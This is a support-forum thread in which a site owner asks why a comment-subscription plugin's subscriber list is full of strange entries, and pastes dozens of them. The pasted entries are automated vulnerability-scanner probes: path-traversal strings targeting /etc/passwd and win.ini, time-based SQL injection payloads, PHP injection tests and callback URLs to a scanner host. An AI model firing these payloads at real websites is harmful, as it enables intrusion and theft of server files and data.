Bizarre list of subscribers
Hi all,
Thanks for the great plugin. I tried 5 of the top-ranked comment subscription plugins and this was the only one that did not conflict with my theme!
I just installed the plugin and already on a couple of pages there are dozens of crazy entries in the list of subscribers. Hack attempts like injection attacks and penetration tests. They are pasted below.
Where do these values come from? Were they submitted as emails in the comments field? And why are they in this list if they were submitted before the plugin was installed, and the real emails of commenters are not in this list? Should I remove them all?
Thanks
%2fetc%2fpasswd '" ';print(md5(acunetix_wvs_security_test));$a=' ";print(md5(acunetix_wvs_security_test));$a=" (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) -1" OR 2+141-141-1=0+0+0+1 -- -1" OR 3+141-141-1=0+0+0+1 -- ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst ................windowswin.ini ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd ../../../../../../../../../../../../../../../proc/version ../../../../../../../../../../etc/passwd ../../../../../../../../../../etc/passwd.tst ../../../../../../../../../../windows/win.ini ../../../../../../../../../../windows/win.ini.tst ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini .\./.\./.\./.\./.\./.\./etc/passwd /../../../../../../../etc/passwd /../..//../..//../..//../..//../..//etc/passwd.tst /.././.././.././.././.././.././.././../etc/./passwd%00 /.\./.\./.\./.\./.\./.\./windows/win.ini /etc/passwd /WEB-INF/web.xml 1 waitfor delay '0:0:3' -- 1'" 164' 1GHlQH3a');select pg_sleep(6); -- 1some_inexistent_file_with_long_name.tst 7w8g5ZR5'; waitfor delay '0:0:6' -- ;print(md5(acunetix_wvs_security_test)); C:WINDOWSsystem32driversetchosts file:///etc/passwd https://hitmUVUdNdJvD.bxss.me/ https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()= index.php index.php/. 
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././ JyI= m3GgSGL5'));select pg_sleep(6); -- ucEg9ldh';select pg_sleep(6); -- WEB-INF/web.xml WEB-INFweb.xml !(()&&!|*|*| %2fetc%2fpasswd '" ';print(md5(acunetix_wvs_security_test));$a=' ";print(md5(acunetix_wvs_security_test));$a=" (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0 ) ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) -1 OR 2+294-294-1=0+0+0+1 -1 OR 2+943-943-1=0+0+0+1 -- -1' OR 2+427-427-1=0+0+0+1 or 'X90KLkLc'=' -1' OR 2+735-735-1=0+0+0+1 -- -1" OR 2+608-608-1=0+0+0+1 -- ../../../../../../../../../../windows/win.ini ../../../../../../../../../../windows/win.ini.tst /.././.././.././.././.././.././.././../etc/./passwd%00 /WEB-INF/web.xml 1 waitfor delay '0:0:4' -- 1some_inexistent_file_with_long_name.tst 907' ;print(md5(acunetix_wvs_security_test)); A0HjJyy4';select pg_sleep(8); -- C:WINDOWSsystem32driversetchosts dJ4Thxyt'; waitfor delay '0:0:4' -- https://hit2AEhkeIVIS.bxss.me/ https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()= index.php index.php/. nCwJHPtS sample%40email.tst V5pZQ2J7'));select pg_sleep(8); -- WEB-INF/web.xml WEB-INFweb.xml xI5GNEWF');select pg_sleep(8); --
Viewing 1 replies (of 1 total)
- The topic ‘Bizarre list of subscribers’ is closed to new replies.